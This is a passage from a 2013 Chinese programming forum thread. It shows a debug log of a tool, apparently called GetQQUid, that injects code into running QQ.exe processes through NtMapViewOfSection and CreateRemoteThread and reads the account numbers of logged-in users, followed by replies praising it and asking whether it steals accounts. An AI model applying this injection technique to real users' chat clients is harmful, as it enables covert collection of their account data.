00000071  10.54393291  [5112] MyIAT:Process32Next   (handle,addr info)  
00000072  10.54396820  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000073  10.54399872  [5112] MyIAT:Process32Next   (handle,addr info)  
00000074  10.54427528  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000075  10.54431629  [5112] MyIAT:Process32Next   (handle,addr info)  
00000076  10.54435539  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000077  10.54438496  [5112] MyIAT:Process32Next   (handle,addr info)  
00000078  10.54442024  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000079  10.54445171  [5112] MyIAT:Process32Next   (handle,addr info)  
00000080  10.54448795  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000081  10.54451752  [5112] MyIAT:Process32Next   (handle,addr info)  
00000082  10.54455280  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000083  10.54458332  [5112] MyIAT:Process32Next   (handle,addr info)  
00000084  10.54461861  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000085  10.54464912  [5112] MyIAT:Process32Next   (handle,addr info)  
00000086  10.54468441  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000087  10.54471493  [5112] MyIAT:Process32Next   (handle,addr info)  
00000088  10.54475021  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000089  10.54477978  [5112] MyIAT:Process32Next   (handle,addr info)  
00000090  10.54481506  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000091  10.54484558  [5112] MyIAT:Process32Next   (handle,addr info)  
00000092  10.54488277  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000093  10.54491138  [5112] MyIAT:Process32Next   (handle,addr info)  
00000094  10.54494762  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000095  10.54497719  [5112] MyIAT:Process32Next   (handle,addr info)  
00000096  10.54501247  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000097  10.54504395  [5112] MyIAT:Process32Next   (handle,addr info)  
00000098  10.54507923  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000099  10.54510880  [5112] MyIAT:Process32Next   (handle,addr info)  
00000100  10.54514408  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000101  10.54517365  [5112] MyIAT:Process32Next   (handle,addr info)  
00000102  10.54521084  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000103  10.54524136  [5112] MyIAT:Process32Next   (handle,addr info)  
00000104  10.54527664  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000105  10.54530716  [5112] MyIAT:Process32Next   (handle,addr info)  
00000106  10.54534245  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000107  10.54537201  [5112] MyIAT:Process32Next   (handle,addr info)  
00000108  10.54540825  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000109  10.54543972  [5112] MyIAT:Process32Next   (handle,addr info)  
00000110  10.54547501  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000111  10.54550457  [5112] MyIAT:Process32Next   (handle,addr info)  
00000112  10.54554081  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000113  10.54557037  [5112] MyIAT:Process32Next   (handle,addr info)  
00000114  10.54560471  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000115  10.54563618  [5112] MyIAT:Process32Next   (handle,addr info)  
00000116  10.54567146  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000117  10.54570198  [5112] MyIAT:Process32Next   (handle,addr info)  
00000118  10.54573727  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000119  10.54576683  [5112] MyIAT:Process32Next   (handle,addr info)  
00000120  10.54580212  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000121  10.54583263  [5112] MyIAT:Process32Next   (handle,addr info)  
00000122  10.54586792  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000123  10.54589844  [5112] MyIAT:Process32Next   (handle,addr info)  
00000124  10.54593468  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000125  10.54596519  [5112] MyIAT:Process32Next   (handle,addr info)  
00000126  10.54600143  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000127  10.54603195  [5112] MyIAT:Process32Next   (handle,addr info)  
00000128  10.54607105  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000129  10.54610252  [5112] MyIAT:Process32Next   (handle,addr info)  
00000130  10.54613876  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000131  10.54617119  [5112] MyIAT:OpenProcess   (4095,0,info.th32ProcessID)  
00000132  10.54664135  [5112] MyIAT:NtMapViewOfSection   (hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)  
00000133  10.54668427  [5112] MyIAT:CreateRemoteThread   (hProcess1,0,0,ViewBase1,0,0,0)  
00000134  10.54684258  [5112] MyIAT:WaitForSingleObject   (hRemoteThread,INFINITE)  
00000135  10.54902363  [5216] Debug mode!  
00000136  10.54912949  [5216] injectIAT:GetModuleHandleA   ("KernelUtil.dll")  
00000137  10.54917145  [5216] injectIAT:GetProcAddress   (eax,"?GetSelfUin@Contact@Util@@YAKXZ")  
00000138  10.54944611  [5112] MyIAT:GetExitCodeThread   (hRemoteThread,addr Return_Value)  
00000139  10.54951668  [5112] MyIAT:wsprintfA   (addr @QQUid,"获取到QQ号:%d",Return_Value)  
00000140  10.54955769  [5112] MyIAT:OutputDebugStringA   (addr @QQUid)  
00000141  10.54959297  [5112] 获取到QQ号:1067968022  
00000142  10.54962349  [5112] MyIAT:CloseHandle   (hRemoteThread)  
00000143  10.54966354  [5112] MyIAT:CloseHandle   (hProcess1)  
00000144  10.54969597  [5112] MyIAT:Process32Next   (handle,addr info)  
00000145  10.54974365  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000146  10.54979992  [5112] MyIAT:OpenProcess   (4095,0,info.th32ProcessID)  
00000147  10.54984188  [5112] MyIAT:NtMapViewOfSection   (hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)  
00000148  10.54989052  [5112] MyIAT:CreateRemoteThread   (hProcess1,0,0,ViewBase1,0,0,0)  
00000149  10.55005360  [5112] MyIAT:WaitForSingleObject   (hRemoteThread,INFINITE)  
00000150  10.55031776  [5988] Debug mode!  
00000151  10.55035591  [5988] injectIAT:GetModuleHandleA   ("KernelUtil.dll")  
00000152  10.55038071  [5988] injectIAT:GetProcAddress   (eax,"?GetSelfUin@Contact@Util@@YAKXZ")  
00000153  10.55056095  [5112] MyIAT:GetExitCodeThread   (hRemoteThread,addr Return_Value)  
00000154  10.55061531  [5112] MyIAT:wsprintfA   (addr @QQUid,"获取到QQ号:%d",Return_Value)  
00000155  10.55064774  [5112] MyIAT:OutputDebugStringA   (addr @QQUid)  
00000156  10.55067635  [5112] 获取到QQ号:xxxxxx隐藏
00000157  10.55070591  [5112] MyIAT:CloseHandle   (hRemoteThread)  
00000158  10.55073643  [5112] MyIAT:CloseHandle   (hProcess1)  
00000159  10.55076599  [5112] MyIAT:Process32Next   (handle,addr info)  
00000160  10.55080891  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000161  10.55084229  [5112] MyIAT:Process32Next   (handle,addr info)  
00000162  10.55088806  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000163  10.55091858  [5112] MyIAT:Process32Next   (handle,addr info)  
00000164  10.55095577  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000165  10.55098629  [5112] MyIAT:Process32Next   (handle,addr info)  
00000166  10.55102444  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000167  10.55105495  [5112] MyIAT:Process32Next   (handle,addr info)  
00000168  10.55109310  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000169  10.55112267  [5112] MyIAT:Process32Next   (handle,addr info)  
00000170  10.55116081  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000171  10.55119133  [5112] MyIAT:Process32Next   (handle,addr info)  
00000172  10.55123043  [5112] MyIAT:lstrcmpiA   (addr info.szExeFile,"QQ.exe")  
00000173  10.55125999  [5112] MyIAT:Process32Next   (handle,addr info)  
00000174  10.55129528  [5112] MyIAT:CloseHandle   (handle)  
00000175  10.55133057  [5112] MyIAT:CloseHandle   (hProcess2)  

GetQQUid.rar (7.23 KB)
2013-01-07 19:17
zklhp
先给个高亮再说

这个能用在什么版本的球球上面呢。。
2013-01-07 19:19
yibana
以下是引用zklhp在2013-1-7 19:19:15的发言:

先给个高亮再说

这个能用在什么版本的球球上面呢。。

球球?
2013-01-07 19:21
hu9jj
盗QQ号?

活到老,学到老!http://www.(该域名已经被ISP盗卖了)E-mail:hu-jj@
2013-01-07 19:32
信箱有效
http://bbs.

2013-01-07 20:11
Alar30
这个真心帅。。
2013-01-08 13:18
信箱有效
6号晚上才在看雪上看到这个标题  7号在这里又看到。
是原创还是转贴?
转贴不注明是不好的呀 楼主
2013-01-08 19:06
zklhp
以下是引用信箱有效在2013-1-8 19:06:24的发言:

6号晚上才在看雪上看到这个标题  7号在这里又看到。
是原创还是转贴?
转贴不注明是不好的呀 楼主
要是原创首发就加精华了 可惜啊 呵呵
2013-01-08 19:17
yibana
以下是引用zklhp在2013-1-8 19:17:18的发言:

要是原创首发就加精华了 可惜啊 呵呵

看雪上没人关注就发这里了,今天打算写一份帮助文档
2013-01-08 19:28
信箱有效
以下是引用yibana在2013-1-8 19:28:18的发言:

 
看雪上没人关注就发这里了,今天打算写一份帮助文档
真是原创呀.大牛有时间多发点学习指导方面的帖子啊。比如汇编啊反汇编啊 逆向分析呀 c++学习啊 MFC学习啊什么什么的。
2013-01-08 20:47